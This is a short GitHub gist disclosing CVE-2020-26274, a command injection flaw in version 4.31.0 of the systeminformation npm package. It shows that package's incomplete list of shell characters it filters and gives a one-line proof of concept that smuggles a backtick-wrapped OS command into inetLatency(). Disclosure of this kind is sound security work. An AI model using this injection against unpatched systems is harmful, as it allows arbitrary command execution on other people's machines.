Skip to content

Instantly share code, notes, and snippets.

@EffectRenan

EffectRenan/CVE-2020-26274.md

Last active December 19, 2020 22:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save EffectRenan/1ec16b8b63e799a632b43adb17763527 to your computer and use it in GitHub Desktop.
Save EffectRenan/1ec16b8b63e799a632b43adb17763527 to your computer and use it in GitHub Desktop.
Download ZIP
[systeminformation] - Command Injection
Raw
CVE-2020-26274.md

Vulnerability: Command Injection - CVE-2020-26274

Package name: systeminformation.

Tested package versions: 4.31.0.

Fixed package versions: >= 4.31.1.

Description: The attacker can send an OS command into quotation marks and it going to be executed.

Sensitive file: lib/internet.js.

The sanitizeShellString function does not sanitize quotation marks:

s[i] === '>' ||
s[i] === '<' ||
s[i] === '*' ||
s[i] === '?' ||
s[i] === '[' ||
s[i] === ']' ||
s[i] === '|' ||
s[i] === '˚' ||
s[i] === '$' ||
s[i] === ';' ||
s[i] === '&' ||
s[i] === '(' ||
s[i] === ')' ||
s[i] === ']' ||
s[i] === '#' ||
s[i] === '\\' ||
s[i] === '\t' ||
s[i] === '\n' ||
s[i] === '"'

Steps to reproduce:

const si = require('systeminformation');
si.inetLatency("`<OS command>`");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment